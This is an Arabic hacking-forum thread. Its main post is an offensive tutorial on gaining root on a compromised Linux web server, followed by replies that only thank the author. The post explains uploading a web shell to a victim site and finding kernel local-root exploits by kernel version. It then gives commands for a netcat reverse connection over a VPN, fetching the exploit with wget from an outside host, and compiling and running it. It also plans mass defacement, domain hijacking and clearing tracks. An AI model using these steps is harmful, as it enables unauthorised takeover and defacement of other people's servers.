حالة الموضوع:
مغلق
  1. SaDaM

    SaDaM Developer

    الأنتساب:
    ‏19 يوليو 2012
    المشاركات:
    60
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    8
    الوظيفة:
    التصميم
    الإقامة:
    Adobe Photoshop CS
    [​IMG]

    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته

    موضوعنا اليوم مفيد بأدن الله الكل يستفاد منه
    [​IMG]

    في بداية الامر سوف ينقسم هذا الموضوع الى
    1. الجزء الاول: ماهو الروت (What is root)
    2. الجزء الثاني: كيف يمكن الحصول على الروت (How can I get on the root)
    3. الجزء الثالث: اللوكل روت وكيف البحث عنة (local root and how to search for him)
    4. الجزء الرابع: اتصال بلسيرفر بكل الطريق (Contact server Every way)
    5. الجزء الخامس: الحصول على الروت (Access to root)
    6. الجزء السادس: ماذا بعد الروت (What happens after root)
    7. الجزء السابع: سحب الدومنين (The withdrawal of my domain)
    8. الجزء الثامن: عمل ماس ديفس (The work of Mass Davis)
    9. الجزء التاسع: التسجيل فى الزون اتش المواقع المخترقة (To register the zon-h hacked sites)
    10. الجزء العشر: مسح اثارك من السيرفر (Clear the tracks from the serve)
    11. الجزء الحادي عشر: بعض المواضع الاخرى للروت وبعد الروت
    [​IMG]
    [NEW]الجزء الاول: ماهو الروت[/NEW]
    الروت : هو اعلى صلاحية في السيرفر لينكس واذا حصل شخص على صلاحية الروت يكون السيرفر كلة في خطر تام كيف يكون السيرفر في خطر انة اقول لك يمكن بعد الحصول على الروت يمكن تسحب الدومنينات المواقع ويمكن تغير جميع انديكسات الموقع بأنديكس اختراق وهذا مايسمى بلــــماس ديفس وراح اشرح في الفقرات التالية وذا حصلت على الروت يكون السيرفر ملكك وهنا فهمنا ماهو الروت واكيد لي يريد يأخذ روت لازم يعرف ماهو الروت اصلا ويكون لدية خبرة في اختراق المواقع

    [​IMG]
    [NEW]الجزء الثاني: كيف يمكن الحصول على الروت[/NEW]
    هناك طرق كثيرة في الحصول على الروت وسوف اذكر اهم الطرق وهي...)
    1-عن طريق اللوكل روت وهي استغلال ثغرة في بكرنيل السيرفر ,وحسب اصدار الكرنيل
    2-عن طريق استغلال ثغرات البرنامج لي على السيرفر
    3-عن طريق قرأة الملفات لي يكون فية باسورد الروت
    وهم طريقة والطريقة الشائعة الان هي طريقة اللوكل الروت واصدار الكرنيل لان نشرح هذة الطريقة
    لكل سيرفر كرنيل واصدار لهذا الكرنيل والهكر الكبار يجدون ثغرة لهذا الاصدار الكرنيل وينقلون هذة الثغرة في اصدار الكرنيل الى مواقع السيكورتي واحنة نستغل هذة الثغرة ومايسمى بلوكل روت وعن طريق الاستغلال هذة الثغرة في السيرفر نحصل على الروت وان شاء الله اشرح لكم الطرق الباقية بأذن الله

    [​IMG]
    [NEW]الجزء الثالث: اللوكل روت وكيف البحث عنة (local root and how to search for him)[/NEW]
    في البداية لنعرف ماهو لوكل الروت :برنامج مبرمج لستغلال ثغرة في اصدار الكرنيل ولوكلات مبرمجة بلغة c وهناك لوكلات مترجمة وذا كان اللوكل مبرمجة بلغة c يحتاج لها ترجمة قبل التشغيل وسوف اشرح لكم في الفقرات التالية بس كيف نفرق بين المترجم والغير مترجم انة اقول لك اذا لوكل منتهي بمتداد c فانة غير مترجم ويحتاج ترجمة واذا لوكل منتهي بغير امتداد او اي امتداد اخر فانة مترجم بس لماذا اللوكل دائما بلغة c لان نوة الكرنيل في نضام لينكس تكون مبرمجة بلغة c شفتوا لازم تتعلموا لينكس لانهو يفيدكم كثيرا
    الان كيف نعرف لوكل المناسب لنا وكيف نقوم بلبحث عنة قي البداية عندما ترفع الشل على السيرفر نقوم بتنفيذ الامر التالي (uname -a)

    اصدار الكرنيل :
    الي بلون الاخضر ذا اصدار الكرنيل
    ولي بلون الازرق ذا النحديث نواة الكرنيل
    او يمكن تنفيذ الامر التالي uname -a ايظا ليظهر لك اصدار لوكل
    الان نريد كيف نبحث على هذا اصدار الكرنيل نريد لة لوكل روت كيف
    اولا:عن طريق عمو قوقل كيف تروح لقوقل وتكتب
    كود PHP:
    local root xxx
    حيث 2.x.x نضع بدلة اصدار الكرنيل
    او
    كود PHP:
    local root exploit 2.xx
    حيث xxx اصدار الكرنيل نضعة بدلة
    ولازم تعرف تحديث الكرنيل مثيل 2011 او 2012 لان كل لوكل يختلف في التحديث

    ثانيا:عن طريق مواقع السكيورتي
    سوف اشرح على اهم موقع لان والاقوى
    هذا الموقع
    1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team

    وتضغط على كلمة Search من اعلى الخيارات ويظهر لك

    ونكتب في البحث كذا
    كود PHP:
    localroot xxx
    حيث 2.XX نضع بدلة اصدار الكرنيل
    وتختار النوع

    وان شاء الله راح تحصل على لوكل روت المناسب
    وهذا مواقع لبحث على لوكل

    كود PHP:
    http://packetstormsecurity.com/
    http://www.1337day.org/
    http://www.exploit-db.com
    [​IMG]
    [NEW]الجزء الرابع: اتصال بل سيرفر بكل الطريق[/NEW]
    اهم يشيء بعد الحصول على لوكل روت هو الاتصال بلسيرفر يعني اذا ماتصلنة بلسيرفر ماراح نحصل على روت والاتصال بلسيرفر يعني بدل ماتروح لشل تروح ل الدوس وتنفذ الاوامر وهناك طرق كثير لاتصال بلسيرفر
    وانة راح اشرح لكم طريقة لي مايستطيع فتح بورت في جهازة مثلي

    هناك طرق كثيرة لتسجيل في موقع VPN ماني راح اشرح انتة احصل على حساب والان بعد الحصول على حساب
    والان بعد الحصول على الحساب يمكنك ان تتصل وانشاء اتصال VPN

    الان سوف اشرح لكم الاتصال بلسيرفر بعد ماعملة اتصال VPN يلا نبدأ على بركة الله
    في البداية الأمر نحمل هذة الاداة وهي netcat
    [DOWNLOAD]The GNU Netcat -- Official homepage -- Downloads[/DOWNLOAD]
    نفك الضغط عنها ونضعها على مسار الهارد c او اي هارد انتة واضع الوندوز فية
    الان كل شيء تمام نحمل الشل

    نرفع الشل على موقع المصاب او الموقع لي انتة تريد الحصول علية على روت اوكي

    الان نذهب الى الدوس كما يلي

    start>>Run>>cmd
    تم الدخول لــــ
    كود PHP:
    dos
    ونضع الامر التالي
    كود PHP:
    cd\
    وبعد ذلك ندخل الى حافظة النت كات بلأمر
    cd netcatتم الدخول من أحسن تسميت مجلد nc الانو أغلبية الهكرز يضعون شروحات ب nc
    اوكي كل شيء تمام

    لمعرفة ip الخاص فينة
    الان نذهب الى الشل لي احنة رافعينة على الموقع الى اخر الشل
    -ip لي احنة طلعناة من الموقع لي فوق
    2-البورت وراح نستخدم بورت 443 البورت الخاص في اتصال ريلاكس
    3-لانغير شيء
    4-لاتضغ الان بعد قليل من اقول لك
    الان كل شيء تمام نرجع الى النت كات
    ونكتب الامر
    كود PHP:
    nc ----p port
    مع تغير port
    الى 443 بورت اتصال ريلاكس
    الان نضغط انتر (enter)
    الان تم الاتصال بلشل الان انتهينة من هذة الخطوة الحمد لله

    ولي مايستطيع الحصول على حساب ريلاكس يمكنة استخدام هذا البرنامج فهوا عملة نفس عمل حساب ريلاكس واسم البرنامج هو CyberGhost VPN ويمكنك البحث عنة قوقل وسوف تجد لة شروحات كثيرة وهو مشهور جدا ^_*

    [​IMG]
    [NEW]الجزء الخامس: الحصول على الروت (Access to root)[/NEW]
    بعد ما اتصلنة بلسيرفر ووجدنة اللوكل المناسب الان نريد سحب الروت على السيرفر
    اول شيء لحصول على الروت هو سحب لوكل على الموقع ويقصل ان يكون المجلد يحمل تصريح 777
    ويسحب اللوكل بامر
    كود PHP:
    wegt www.XXXXXX.com/localroot.zip
    wegt<<<الامر السحب
    www.viers.com/local.zip<<<موقع لوكل او انتة ترفع لوكل على اي موقع مجاني ويفض لوكل بمتداد zip
    الان تم السحب
    نفط الضغط بامر
    كود PHP:
    unzip local.zip
    unzip<<<امر فك الضغط
    local.zip<<<اسم لوكل مع الامتداد
    الان نعطي لوكل تصريح 777 بامر
    كود PHP:
    chmod 777 local.c
    chmod<<<امر تغير تصريح اي ملف
    777<<<رقم التصريح
    local.c<<<لوكل

    بعد ذلك نترجم اللوكل بامر التالي
    كود PHP:
    gcc local.c –o local
    بعد سوف تجد لوكل بدون امتداد هكذا


    local

    بعد ذلك نعطي اللوكل المترجم تصريح 777 بامر التالي

    كود PHP:
    chmod 777 local 

    بعد ذلك نشغل اللوكل بامر

    [PHP]local ./ 

    وسوف يشتغل لوكل

     نقوم بتنفيذ

    الامر التالي لرؤية الاصلاحية الان

    ID

    الان صلاحيتنة روت 

     ننفذ لامر التالي

    su 

    لحصول على صلاحية روت كاملة 

    [IMG]http://www.iq-team.org/elan/by3.png[/IMG]
    [/CENTER]
    [/
    CENTER]
     
    2 شخص معجب بهذا.
  2. !Hackon!

    !Hackon! Developer

    الأنتساب:
    ‏14 مارس 2012
    المشاركات:
    59
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الوظيفة:
    Hacking
    الإقامة:
    لــبــنــان
    رد: توضيحات مهمه كيف اخذ صلاحيات Root للتحكم الكامل بالسرفر المخترق

    يعطيك العافيه اخوي ما قصرت
    موضوع مهم جدآ:{1}:​
     
  3. Јoяdαη

    Јoяdαη Active DeveloPer

    الأنتساب:
    ‏12 مارس 2012
    المشاركات:
    92
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الوظيفة:
    Security Hacking Sites
    الإقامة:
    الاردن
    رد: توضيحات مهمه كيف اخذ صلاحيات Root للتحكم الكامل بالسرفر المخترق

    بارك الله فيك اخي
    ما قصرت . تستاهل احلى تقيم
     
  4. мя.ωℓσ

    мя.ωℓσ Developer

    الأنتساب:
    ‏23 يونيو 2012
    المشاركات:
    49
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    8
    الوظيفة:
    Unemployed
    الإقامة:
    ..| ღ |..
    رد: توضيحات مهمه كيف اخذ صلاحيات Root للتحكم الكامل بالسرفر المخترق

    وعليكم آلسسسلأم ورحمه آلله وبركـآته ,

    آلله يعطيك العـآفيه على الموضوع المفيد



    )5:"​
     
  5. KaBriMO

    KaBriMO Developer

    الأنتساب:
    ‏14 يوليو 2012
    المشاركات:
    39
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    المغرب
    رد: توضيحات مهمه كيف اخذ صلاحيات Root للتحكم الكامل بالسرفر المخترق

    يعطيك العافيه​
     
  6. osaod

    osaod Developer

    الأنتساب:
    ‏19 نوفمبر 2012
    المشاركات:
    41
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: توضيحات مهمه كيف اخذ صلاحيات Root للتحكم الكامل بالسرفر المخترق

    درس جميل وافادني جدا شكرا لك استاذي ...}
     
  7. jőŐőķєя

    jőŐőķєя Developer

    الأنتساب:
    ‏9 ديسمبر 2011
    المشاركات:
    56
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الوظيفة:
    طآلب , ثآنوي ..●
    الإقامة:
    في عالم لا يسكنه غيريُ
    رد: توضيحات مهمه كيف اخذ صلاحيات Root للتحكم الكامل بالسرفر المخترق


    بارك الله فيك يابعدي
    )4:")4:")4:"​
     
  8. نـغـمـة الـمــوت

    نـغـمـة الـمــوت Developer

    الأنتساب:
    ‏22 يناير 2012
    المشاركات:
    22
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    مصـ ام الدنيا ـر
    رد: توضيحات مهمه كيف اخذ صلاحيات Root للتحكم الكامل بالسرفر المخترق

    يعطيك العافيـة يامبدع

    مجهود كبير ، تسلم ايدك
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة